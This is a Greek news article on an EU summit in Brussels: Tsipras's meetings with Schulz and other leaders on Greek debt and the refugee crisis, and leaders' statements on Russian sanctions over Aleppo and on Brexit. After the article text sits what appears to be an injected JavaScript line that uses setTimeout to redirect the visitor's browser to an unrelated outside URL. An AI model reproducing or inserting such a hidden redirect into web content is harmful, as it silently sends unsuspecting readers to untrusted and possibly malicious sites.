Σύνοδος Κορυφής: Tα τετ α τετ Τσίπρα- Η ατζέντα των «28»

0
6

 

Οι τελευταίες εξελίξεις στο προσφυγικό καθώς και η ανάγκη για την επίτευξη ομοφωνίας σε ό,τι αφορά τα ζητήματα μεταναστευτικής πολιτικής της ΕΕ θα αποτελέσουν το πρώτο θέμα της Συνόδου Κορυφής που πραγματοποιείται στις Βρυξέλλες.

Ο Πρωθυπουργός Αλέξης Τσίπρας, ο οποίος βρίσκεται από χθες στις Βρυξέλλες, έχει σειρά επαφών στο περιθώριο της Συνόδου, όπου κυριαρχούν τα θέματα σχετικά με την ολοκλήρωση της δεύτερης αξιολόγησης και της ελάφρυνσης του ελληνικού χρέους, την ώρα, μάλιστα, που ο Μάριο Ντράγκι έκανε γνωστή την πρόθεση της ΕΚΤ να προχωρήσει «ανεξάρτητα» σε αξιολόγηση βιωσιμότητας του χρέους.

Ο κ.Τσίπρας συναντήθηκε ήδη με τον Πρόεδρο του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σουλτς. Σύμφωνα με κυβερνητικές πηγές, το κεντρικό μήνυμα της συνάντησης ήταν η ανάγκη τήρησης των συμφωνιών για τη βιωσιμότητα του ελληνικού χρέους. Οι ίδιες πηγές ανέφεραν ότι στη συνάντηση με τον πρόεδρο του Ευρωπαϊκού Κοινοβουλίου ο πρωθυπουργός έθεσε το ζήτημα του χρέους, επισημαίνοντας ότι η ελληνική κυβέρνηση προτίθεται να ολοκληρώσει τη δεύτερη αξιολόγηση σύντομα και εντός των χρονοδιαγραμμάτων.

Ο κ. Τσίπρας υπενθύμισε ότι η ολοκλήρωση της δεύτερης αξιολόγησης συνδέεται με τη συμφωνία του περασμένου Μαϊου για το ελληνικό χρέος και ως εκ τούτου επιθυμεί έως το τέλος του χρόνου να υπάρξει λύση που θα το καθιστά βιώσιμο.

«Ευήκοον ους» από τον κ. Σουλτς, σημείωσαν οι κυβερνητικές πηγές για τη θέση της ελληνικής πλευράς για το χρέος, επισημαίνοντας ότι το Ευρωπαϊκό Κοινοβούλιο και ειδικότερα οι Επιτροπές Οικονομικών Υποθέσεων και Απασχόλησης έχουν συμβάλει στην προώθηση της συζήτησης για το χρέος και θα συνεχίσουν να το κάνουν.

Επίσης, κατά την συνομιλία που είχαν μπροστά στις κάμερες ο Αλέξης Τσίπρας τόνισε προς τον κ. Σουλτς ότι πρέπει όλοι μαζί να αντιμετωπίσουμε στο μέλλον τις προκλήσεις σχετικά με το θέμα της μετανάστευσης και το προσφυγικό. Από την πλευρά του, ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου σημείωσε πως οι Έλληνες δεν μπορούν να αντιμετωπίσουν τα προβλήματα μόνοι τους. «Δεν είναι ελληνικό το πρόβλημα. Αυτό που χρειαζόμαστε είναι άμεση αλληλεγγύη», τόνισε ο κ. Σουλτς.

Το πρωί της Παρασκευής ο πρωθυπουργός αναμένεται να συναντηθεί με τη Γερμανίδα καγκελάριο, Άνγκελα Μέρκελ. Σύμφωνα με τις ίδιες πηγές, ο κ. Τσίπρας αναμένεται να συναντηθεί, στο περιθώριο της συνόδου, με τον Πρόεδρο της Γαλλίας, Φρανσουά Ολάντ και τον πρόεδρο της Ευρωπαϊκή Επιτροπής, Ζαν Κλοντ Γιούνκερ.

Ο Αλέξης Τσίπρας χθες συναντήθηκε και με τον Πρόεδρο της Κυπριακής Δημοκρατίας Νίκο Αναστασιάδη. Ο κ. Αναστασιάδης ενημέρωσε τον Αλέξη Τσίπρα για την πορεία των διακοινοτικών συνομιλιών. Στο πλαίσιο αυτό, συζητήθηκε ο συντονισμός μεταξύ Ελλάδας και Κύπρου, για την αμέσως επόμενη περίοδο, στο ζήτημα της ασφάλειας και των εγγυήσεων.

Προσερχόμενος στη Σύνοδο Κορυφής στις Βρυξέλλες ο Ντόναλντ Τουσκ τόνισε ότι παραμένει ανοιχτό το ενδεχόμενο να υπάρξουν κυρώσεις κατά της Ρωσίας για τη δράση της στη Συρία και ειδικότερα στο Χαλέπι. Όπως ξεκαθάρισε, ακόμη, ο πρόεδρος του Ευρωπαϊκού Συμβουλίου, δεν πρόκειται να συζητηθεί το ζήτημα του Brexit, καθώς η Μ. Βρετανία δεν έχει ακόμη υποβάλει αίτημα εξόδου από την Ένωση.

Απέρριψε ακόμη τους ισχυρισμούς ότι η Τερέζα Μέι θα βρεθεί αντιμέτωπη με μια εχθρική υποδοχή και δήλωσε ότι οι σχέσεις θα παραμείνουν φιλικές ενώ δήλωσε πως αναμένει η Μέι να ενημερώσει αργότερα τους άλλους 27 ηγέτες.

Στο ίδιο μήκος κύματος και οι δηλώσεις της Άνγκελα Μέρκελ. Κατά την άφιξή της στην Σύνοδο Κορυφής χαρακτήρισε απάνθρωπα τα όσα συμβαίνουν στο Χαλέπι από τις δυνάμεις του προέδρου της Συρίας Μπασάρ Αλ Άσαντ και τις ρωσικές δυνάμεις και πρόσθεσε πως «το να γίνεται συζήτηση είναι σημαντικό, αλλά πρέπει να υπάρξει μια θέση και πρέπει να καταδείξουμε ότι αυτά που συνέβησαν στο Χαλέπι με την υποστήριξη της Ρωσίας είναι πραγματικά απάνθρωπα».

Όσο αναφορά στο ζήτημα του Brexit σημείωσε ότι «είναι πλέον θέμα του Ηνωμένου Βασιλείου να υποβάλει το αίτημα αποχώρησης, το Brexit θα μας απασχολήσει ελάχιστα στην ημερήσια διάταξη, ωστόσο θα καλωσορίσουμε την πρωθυπουργό Τερέζα Μέι».

Εάν η Τερέζα Μέι επιλέξει τη λογική του «σκληρού Brexit», τότε και οι διαπραγματεύσεις που θα οδηγήσουν σε αυτό θα είναι επίσης σκληρές, ξεκαθάρισε, από την πλευρά του, ο πρόεδρος της Γαλλίας Φρανσουά Ολάντ, εισερχόμενος στη Σύνοδο Κορυφής στις Βρυξέλλες. Ο επικεφαλής του γαλλικού κράτους σημείωσε ακόμη ότι, εάν η Ρωσία δεν τηρήσει την υπεσχημένη κατάπαυση του πυρός στο Χαλέπι, «όλα τα ενδεχόμενα είναι ανοικτά».

Νωρίτερα, ο Πρόεδρος του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σουλτς, προσερχόμενος στη Σύνοδο Κορυφής, κληθείς να σχολιάσει το ενδεχόμενο νέων κυρώσεων προς τη Ρωσία, δήλωσε πως «οι κυρώσεις υπάρχουν και εφαρμόζουμε κυρώσεις περισσότερο από δύο χρόνια νομίζω ήδη. Οι κυρώσεις θα πρέπει να διατηρηθούν και να συνεχίσουν να επιβάλλονται μέχρι η συμφωνία Μινσκ να εφαρμοστεί εξ ολοκλήρου και να γίνει σεβαστή από όλα τα μέρη».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here